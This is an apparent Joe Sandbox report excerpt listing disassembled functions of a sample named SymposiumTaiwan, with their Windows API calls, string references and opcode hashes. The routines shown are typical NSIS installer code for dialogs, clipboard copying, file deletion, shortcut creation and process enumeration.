Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C

Non-executed Functions

Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 0040515B
GetDlgItem.USER32(?,000003EE), ref: 0040516A
GetClientRect.USER32(?,?), ref: 004051C2
GetSystemMetrics.USER32(00000015), ref: 004051CA
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
ShowWindow.USER32(?,00000008), ref: 00405266
GetDlgItem.USER32(?,000003EC), ref: 00405287
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
GetDlgItem.USER32(?,000003F8), ref: 00405179

Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042634C,762323A0,00000000), ref: 00406902

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

GetDlgItem.USER32(?,000003EC), ref: 004052D7
CreateThread.KERNEL32(00000000,00000000,Function_00005073,00000000), ref: 004052E5
CloseHandle.KERNEL32(00000000), ref: 004052EC
ShowWindow.USER32(00000000), ref: 00405313
ShowWindow.USER32(?,00000008), ref: 00405318
ShowWindow.USER32(00000008), ref: 0040535F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
CreatePopupMenu.USER32 ref: 004053A2
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
GetWindowRect.USER32(?,?), ref: 004053CA
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
OpenClipboard.USER32(00000000), ref: 00405437
EmptyClipboard.USER32 ref: 0040543D
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405453
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405489
SetClipboardData.USER32(0000000D,00000000), ref: 00405494
CloseClipboard.USER32 ref: 0040549A

Strings

New install of "%s" to "%s", xrefs: 004051AE
{, xrefs: 0040537E

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: New install of "%s" to "%s"${
API String ID: 2110491804-1641061399
Opcode ID: b870e07e0f90b65775997a4172df4cb72c50b11c5a38a9ad208b9f3c2b6ee9f0
Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
Opcode Fuzzy Hash: b870e07e0f90b65775997a4172df4cb72c50b11c5a38a9ad208b9f3c2b6ee9f0
Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 004049BF
GetDlgItem.USER32(?,00000408), ref: 004049CC
GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
LoadBitmapW.USER32(0000006E), ref: 00404A2E
SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
DeleteObject.GDI32(?), ref: 00404AA5
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
ShowWindow.USER32(?,00000005), ref: 00404BFB
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
ImageList_Destroy.COMCTL32(?), ref: 00404DC8
GlobalFree.KERNEL32(?), ref: 00404DD8
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
ShowWindow.USER32(?,00000000), ref: 00404F75
GetDlgItem.USER32(?,000003FE), ref: 00404F80
ShowWindow.USER32(00000000), ref: 00404F87

Strings

, xrefs: 00404F65
@, xrefs: 00404BBC
N, xrefs: 00404C32
M, xrefs: 00404B6F

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58

Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
lstrcatW.KERNEL32(00467470,\*.*), ref: 00406D35
lstrcatW.KERNEL32(?,00409838), ref: 00406D55
lstrlenW.KERNEL32(?), ref: 00406D58
FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
FindClose.KERNEL32(?), ref: 00406E5F

Strings

RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
ptF, xrefs: 00406D1A
\*.*, xrefs: 00406D2F
Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
Delete: DeleteFile failed("%s"), xrefs: 00406E29
Delete: DeleteFile("%s"), xrefs: 00406DE8
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
API String ID: 2035342205-1650287579
Opcode ID: 0773e1bb02d94fce99ad1c6111755f8979c63676e37ea285c86d1b4844ce1413
Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
Opcode Fuzzy Hash: 0773e1bb02d94fce99ad1c6111755f8979c63676e37ea285c86d1b4844ce1413
Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE

Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 00404525
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
GetDlgItem.USER32(?,000003FB), ref: 00404553
GetAsyncKeyState.USER32(00000010), ref: 0040455A
GetDlgItem.USER32(?,000003F0), ref: 0040456F
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
SetWindowTextW.USER32(?,?), ref: 004045AF
SHBrowseForFolderW.SHELL32(?), ref: 00404669
lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
CoTaskMemFree.OLE32(00000000), ref: 00404674

Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000), ref: 00403EBB

GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042634C,762323A0,00000000), ref: 00406902

SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819

Strings

A, xrefs: 00404662
F, xrefs: 004046A0

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: F$A
API String ID: 3347642858-1281894373
Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59

Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
lstrcmpA.KERNEL32(name,?), ref: 00406FF3
CloseHandle.KERNEL32(?), ref: 00407212

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

%s: failed opening file "%s", xrefs: 00406F38
name, xrefs: 00406FEB
GetTTFNameString, xrefs: 00406F33

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54

Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
lstrlenW.KERNEL32(?), ref: 004063F8
GetVersionExW.KERNEL32(?), ref: 00406456

Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
FreeLibrary.KERNEL32(00000000), ref: 00406500
GlobalFree.KERNEL32(?), ref: 00406509

Strings

Module32FirstW, xrefs: 004065FF
CreateToolhelp32Snapshot, xrefs: 004065E1
GetModuleBaseNameW, xrefs: 004064C0
EnumProcessModules, xrefs: 004064B6
Process32FirstW, xrefs: 004065E9
Unknown, xrefs: 00406528
EnumProcesses, xrefs: 004064AE
Module32NextW, xrefs: 0040660A
PSAPI.DLL, xrefs: 00406490
Process32NextW, xrefs: 004065F4
Kernel32.DLL, xrefs: 004065C7

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59

Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
ShowWindow.USER32(?), ref: 004054FE
DestroyWindow.USER32 ref: 00405512
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
GetDlgItem.USER32(?,?), ref: 0040554F
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
IsWindowEnabled.USER32(00000000), ref: 0040556A
GetDlgItem.USER32(?,00000001), ref: 00405619
GetDlgItem.USER32(?,00000002), ref: 00405623
SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
GetDlgItem.USER32(?,00000003), ref: 00405734
ShowWindow.USER32(00000000,?), ref: 00405756
EnableWindow.USER32(?,?), ref: 00405768
EnableWindow.USER32(?,?), ref: 00405783
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
EnableMenuItem.USER32(00000000), ref: 004057A0
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
SetWindowTextW.USER32(?,00451D98), ref: 00405808
ShowWindow.USER32(?,0000000A), ref: 0040593C

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
GetDlgItem.USER32(?,000003E8), ref: 004041AD
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
GetSysColor.USER32(?), ref: 004041DB
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
lstrlenW.KERNEL32(?), ref: 00404202
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E

Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030

GetDlgItem.USER32(?,0000040A), ref: 00404276
SendMessageW.USER32(00000000), ref: 0040427D
GetDlgItem.USER32(?,000003E8), ref: 004042AA
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
SetCursor.USER32(00000000), ref: 004042FE
ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
SetCursor.USER32(00000000), ref: 00404322
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363

Strings

N, xrefs: 00404298
F, xrefs: 004042D3
open, xrefs: 0040430B

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: F$N$open
API String ID: 3928313111-1104729357
Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
